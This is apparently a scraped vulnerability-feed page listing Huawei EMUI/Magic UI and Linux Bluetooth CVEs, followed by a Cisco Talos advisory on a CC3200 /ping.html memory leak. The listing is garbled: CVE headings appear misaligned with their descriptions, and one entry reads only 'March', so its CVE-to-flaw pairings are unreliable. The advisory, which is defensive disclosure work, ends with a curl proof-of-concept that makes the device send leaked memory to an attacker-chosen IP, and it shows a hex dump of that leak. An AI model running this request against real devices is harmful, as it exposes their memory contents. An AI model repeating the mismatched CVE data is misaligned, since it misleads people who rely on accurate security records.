Impact: Successful exploitation of this vulnerability may affect availability.

CVE-2021-40051: Unauthorized access vulnerability in system components

Severity: Medium

Affected versions: EMUI 12.0.0, EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability will affect confidentiality.

CVE-2021-40050: Out-of-bounds read vulnerability in the IFAA module

Severity: High

Affected versions: EMUI 12.0.0, EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may cause stack overflow.

CVE-2021-40049: Permission control vulnerability in the PMS module

Severity: Medium

Affected versions: EMUI 12.0.0, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability can lead to sensitive system information being obtained without authorization.

CVE-2021-40048: Incorrect buffer size calculation vulnerability in the video framework

Severity: High

Affected versions: EMUI 12.0.0, EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, EMUI 10.0.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability will affect availability.

CVE-2021-40062: Vulnerability of copying input buffer without checking its size in the video framework

Severity: High

Affected versions: EMUI 10.1.1, EMUI 10.1.0, Magic UI 3.1.1, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may affect availability.

CVE-2021-40055: Man-in-the-middle attack vulnerability during system update download in recovery mode

Severity: Critical

Affected versions: EMUI 12.0.0, EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, EMUI 10.0.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability may affect integrity.

CVE-2021-40061: Vulnerability of accessing resources using an incompatible type (type confusion) in the Bastet module

Severity: Medium

Affected versions: EMUI 12.0.0, EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may affect integrity.

CVE-2021-40060: Heap-based buffer overflow vulnerability in the video framework

Severity: High

Affected versions: EMUI 10.1.1, EMUI 10.1.0, Magic UI 3.1.1, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may affect availability.

CVE-2021-40059: Permission control vulnerability in the Wi-Fi module

Severity: Medium

Affected versions: EMUI 12.0.0, EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may affect confidentiality.

CVE-2021-40058: Heap-based buffer overflow vulnerability in the video framework

Severity: High

Affected versions: EMUI 10.1.1, EMUI 10.1.0, Magic UI 3.1.1, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may affect availability.

CVE-2021-40057: Heap-based and stack-based buffer overflow vulnerabilities in the video framework

Severity: High

Affected versions: EMUI 10.1.1, EMUI 10.1.0, Magic UI 3.1.1, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may affect availability.

CVE-2021-40056: Vulnerability of copying input buffer without checking its size in the video framework

Severity: High

Affected versions: EMUI 10.1.1, EMUI 10.1.0, Magic UI 3.1.1, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may affect availability.

CVE-2021-40063: Improper access control vulnerability in the video module

Severity: High

Affected versions: EMUI 12.0.0, EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0

Impact: Successful exploitation of this vulnerability may affect confidentiality.

CVE-2021-40064: Heap-based buffer overflow vulnerability in system components

Severity: High

Affected versions: EMUI 12.0.0, EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, EMUI 10.1.0, EMUI 10.0.0, Magic UI 4.0.0, Magic UI 3.1.1, Magic UI 3.1.0, Magic UI 3.0.0

Impact: Successful exploitation of this vulnerability may affect system stability.

CVE-2021-40011: Uncontrolled resource consumption vulnerability in the display module

Severity: High

Affected versions: EMUI 12.0.0

Impact: Successful exploitation of this vulnerability may affect integrity.

CVE-2021-40052: March

A use-after-free flaw was found in the Linux kernel’s Bluetooth subsystem in the way user calls connect to the socket and disconnect simultaneously due to a race condition. This flaw allows a user to crash the system or escalate their privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

CVE-2021-3752: [PATCH 5.15 187/917] Bluetooth: fix use-after-free error in lock_sock_nested()

An information disclosure vulnerability exists in the HTTP Server /ping.html functionality of Texas Instruments CC3200 SimpleLink Solution NWP 2.9.0.0. A specially-crafted HTTP request can lead to an uninitialized read. An attacker can send an HTTP request to trigger this vulnerability.

**Summary**

An information disclosure vulnerability exists in the HTTP Server /ping.html functionality of Texas Instruments CC3200 SimpleLink Solution NWP 2.9.0.0. A specially-crafted HTTP request can lead to an uninitialized read. An attacker can send an HTTP request to trigger this vulnerability.

**Tested Versions**

Texas Instruments CC3200 SimpleLink Solution NWP 2.9.0.0  
Sealevel Systems, Inc. SeaConnect 370W v1.3.34

**Product URLs**

CC3200 SimpleLink Solution - https://www.ti.com/lit/ds/symlink/cc3200.pdf SeaConnect 370W - https://www.sealevel.com/product/370w-a-wifi-to-form-c-relays-digital-inputs-a-d-inputs-and-1-wire-bus-seaconnect-multifunction-io-edge-module-powered-by-seacloud/

**CVSSv3 Score**

5.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

**CWE**

CWE-457 - Use of Uninitialized Variable

**Details**

The CC3200 SimpleLink Wi-Fi and Internet-of-Things Solution is a Texas Instruments microcontroller with built in 2.4GHz Wi-Fi capabilities. It consists of an ARM Cortex-M4 for execution of the customer application and a secondary ARM MCU identified as the Network Processor (NWP). The NWP not only provides Wi-Fi capabilities, but an IPv4/IPv6-capable networking stack with built-in support for common protocols including TCP, UDP, DHCP, ARP, DNS, MDNS, TLS and an HTTP Server.

The CC3200 SimpleLink Network Processor (NWP) includes a built-in HTTP server. This web server includes a default web page, enabled by default, that services certain HTTP requests without ever involving the application processor. These requests include various static files (images, CSS, about.html, etc.) as well as a handful of ‘Actions’ that effect various responses from the NWP. By default, these embedded resources are accessible and require no authentication. Both of these configurations can be modified by the host application.

A full listing of these actions are available in TI SWRU368C, Table 11-23, but in this case we will focus on the ping.html action.

An HTTP POST request destined for /ping.html may contain three parameters: 1. __SL_P_T.A - The target IP Address 2. __SL_P_T.B - The size of the packet (between 32 and 1472 bytes) 3. __SL_P_T.C - The number of pings to execute (between 1 and 255)

If the minimum size parameter (__SL_P_T.B) is provided, the contents of the ICMP ping payload will be:

    0x0000:  4500 003c 0046 0000 8001 b121 c0a8 0408  E..<.F.....!....
    0x0010:  c0a8 0401 0800 4558 0408 0000 5049 4e47  ......EX....PING
    0x0020:  2054 4553 5420 306e 6344 6174 6120 0000  .TEST.0ncData...
    0x0030:  0000 0000 0000 0000 0000 0000            ............
    

If the maximum size parameter is provided, the contents of the ICMP ping payload will be:

    0x0000:  4500 05dc 023b 0000 8001 a98c c0a8 0408  E....;..........
    0x0010:  c0a8 0401 0800 44c3 0408 0000 5049 4e47  ......D.....PING
    0x0020:  2054 4553 5420 306e 6344 6174 6120 0000  .TEST.0ncData...
    0x0030:  d424 6a05 c499 88a2 0000 293e c014 c014  .$j.......)>....
    0x0040:  0039 0011 0005 0035 003c 0004 c027 c03d  .9.....5.<...'.=
    0x0050:  0000 0123 1100 0000 4000 0000 0000 0000  ...#....@.......
    0x0060:  6fdd 5407 dce3 c37f fd2e 8815 d13b 7313  o.T..........;s.
    0x0070:  1000 0d00 0c00 0a02 0102 0202 0304 0104  ................
    0x0080:  03f0 1daa 66c1 cffe 005e 46b1 056a 24d4  ....f....^F..j$.
    0x0090:  a288 99c4 3e29 0000 14c0 14c0 1100 3900  ....>)........9.
    0x00a0:  3500 0500 0400 3c00 3dc0 27c0 2301 0000  5.....<.=.'.#...
    0x00b0:  1100 0000 4000 0000 0000 0000 4150 f831  ....@.......AP.1
    0x00c0:  7183 8bf4 5a47 eb14 cad7 788b 6329 3a81  q...ZG....x.c):.
    0x00d0:  cd31 1b24 9528 8b30 b9a7 2814 1000 0d00  .1.$.(.0..(.....
    0x00e0:  0c00 0a02 0102 0202 0304 0104 031d f051  ...............Q
    0x00f0:  fecf c166 b146 5e00 d424 6a05 c499 88a2  ...f.F^..$j.....
    0x0100:  0000 293e c014 c014 0039 0011 0005 0035  ..)>.....9.....5
    0x0110:  003c 0004 c027 c03d 0000 0123 0000 0000  .<...'.=...#....
    0x0120:  0000 0000 0000 0000 9941 0c00 0000 0000  .........A......
    0x0130:  0000 0000 0000 0000 0100 0000 fcca 0220  ................
    0x0140:  3448 0220 0000 0080 fcca 0220 3448 0220  4H..........4H..
    0x0150:  7961 0900 60ee 0020 9c42 0220 e8ee 0020  ya..`....B......
    0x0160:  bc42 0220 0000 0000 0000 0000 0000 0000  .B..............
    0x0170:  0000 0000 0000 0000 0000 0000 918b 0820  ................
    0x0180:  0000 0000 bc4b 0320 0000 0000 3003 0000  .....K......0...
    0x0190:  0000 0000 8323 0200 0000 0000 be2c 0204  .....#.......,..
    0x01a0:  0000 0000 0000 0000 0000 0000 3db2 0320  ............=...
    0x01b0:  0100 0000 0010 0000 0000 0000 0000 0000  ................
    0x01c0:  51b2 0320 0100 0000 0000 0000 0000 0000  Q...............
    0x01d0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
    0x01e0:  0000 0000 0007 0001 0001 0001 0000 0000  ................
    0x01f0:  0000 0001 0000 0100 0001 0000 0101 0000  ................
    0x0200:  0000 0000 0000 0000 0000 0000 b277 47e1  .............wG.
    0x0210:  0000 0000 0000 0000 0000 0000 0cc1 0120  ................
    0x0220:  0cc1 0120 94fb 0220 7792 0b00 0801 0841  ........w......A
    0x0230:  0100 0000 0100 0000 b827 eb72 8feb 0000  .........'.r....
    0x0240:  000a 0b21 0b9f 0220 b827 eb72 8feb 0000  ...!.....'.r....
    0x0250:  e5ef 0900 1000 0000 0300 0000 0200 0000  ................
    0x0260:  f0b5 0320 0000 0000 ac5a 0320 0000 0000  .........Z......
    0x0270:  0caf 0320 c0be 0320 045a 0320 585a 0320  .........Z..XZ..
    0x0280:  2000 0000 0000 0820 713d 0800 74f3 0020  ........q=..t...
    0x0290:  0400 0000 0c00 0000 f401 0000 70af 0320  ............p...
    0x02a0:  c44c 0320 2804 0000 c8fc ffff 2000 0000  .L..(...........
    0x02b0:  2402 0000 0100 0000 0a00 0000 399a 0700  $...........9...
    0x02c0:  e8fe 0120 5cf0 0020 0200 0000 0100 0000  ....\...........
    0x02d0:  0000 0000 0000 0000 e5da 0900 312b 0c00  ............1+..
    0x02e0:  846c 0120 0000 0000 0000 0000 0000 0000  .l..............
    0x02f0:  f002 0000 8cbe 0320 5401 0120 0a0a 00ef  ........T.......
    0x0300:  a410 01c0 b827 eb72 8feb 000a 0b21 0b9f  .....'.r.....!..
    0x0310:  efef efef efef efef efef efef efef efef  ................
    0x0320:  efef efef efef efef efef efef efef efef  ................
    0x0330:  efef efef efef efef 918b 0820 2000 0000  ................
    0x0340:  0000 0080 5000 0000 5000 0000 7848 0220  ....P...P...xH..
    0x0350:  0400 0000 233b 0a00 3454 0900 0000 0000  ....#;..4T......
    0x0360:  0100 0000 0000 0000 d8c8 0220 6dfa 0500  ............m...
    0x0370:  f404 0000 94fd ffff 7777 772f 7361 6665  ........www/safe
    0x0380:  2f70 696e 672e 6874 6d6c 0000 0000 0000  /ping.html......
    0x0390:  0000 0000 0000 0000 0000 0000 0000 0000  ................
    0x03a0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
    0x03b0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
    0x03c0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
    0x03d0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
    0x03e0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
    0x03f0:  0000 0000 0000 0000 0000 0000 0000 0000  ................
    0x0400:  0000 0000 0000 0000 0000 0000 0000 0000  ................
    0x0410:  0000 0000 0000 0000 0000 0000 0000 0000  ................
    0x0420:  0000 0000 0000 0000 0000 0000 0100 0000  ................
    0x0430:  0000 0000 e5da 0900 0000 0000 0000 0000  ................
    0x0440:  0000 0000 1000 0000 8097 0220 2d54 0c00  ............-T..
    0x0450:  0000 0000 0000 0000 0000 0000 0201 0200  ................
    0x0460:  0100 1003 595c 3754 4768 e6c7 1dfc dee1  ....Y\7TGh......
    0x0470:  b277 47e1 0000 0000 0000 0000 0000 0000  .wG.............
    0x0480:  0000 0000 0000 0000 0000 0000 0000 0000  ................
    0x0490:  0000 0000 0000 0000 0000 0000 233b 0a00  ............#;..
    0x04a0:  b430 0000 0000 0000 d898 0220 64d5 0b00  .0..........d...
    0x04b0:  0000 0000 e5ef 0900 1000 0000 0300 0000  ................
    0x04c0:  0200 0000 f0b5 0320 0000 0000 0000 0000  ................
    0x04d0:  0000 0000 0000 0000 8097 0220 3ded 0900  ............=...
    0x04e0:  0000 0000 8097 0220 6c4c 0320 5df1 0800  ........lL..]...
    0x04f0:  0000 0000 cfc9 0100 918b 0820 2000 0000  ................
    0x0500:  0000 0000 0000 0000 0000 0000 d400 0000  ................
    0x0510:  2cfb 0020 5401 0120 595c 3754 4768 e6c7  ,...T...Y\7TGh..
    0x0520:  1dfc dee1 b277 47e1 0000 0000 0000 0000  .....wG.........
    0x0530:  0000 0000 0000 0000 0000 0000 0000 0000  ................
    0x0540:  0000 0000 0000 0000 0000 0000 0000 0000  ................
    0x0550:  0000 0000 0000 0000 0000 0000 8400 0000  ................
    0x0560:  a4be 0320 3c53 0320 595c 3754 4768 e6c7  ....<S..Y\7TGh..
    0x0570:  1dfc dee1 b277 47e1 0000 0000 0000 0000  .....wG.........
    0x0580:  0000 0000 0000 0000 3000 0000 acff ffff  ........0.......
    0x0590:  0000 0000 182b 0120 e08b 0000 0000 0000  .....+..........
    0x05a0:  70ae 0320 0000 0000 0000 0000 0000 0000  p...............
    0x05b0:  5c01 0120 0000 0000 0000                 \.........
    

The disclosed information could potentially contain sensitive information such as passwords and tokens, or could be used to bypass exploit mitigation by leaking addresses or stack cookies.

**Exploit Proof of Concept**

    curl -i -s -k -X $'POST' \
    -H $'Content-Length: 51' \
    --data-binary $'__SL_P_T.A=<attacker_ip>&__SL_P_T.B=1472&__SL_P_T.C=1' \
    $'http://<target_ip>/ping.html'
    

**Timeline**

2021-10-21 - Vendor Disclosure  
2022-02-15 - Public Release  

Discovered by Francesco Benvenuto and Matt Wiseman of Cisco Talos.

Tag

#wifi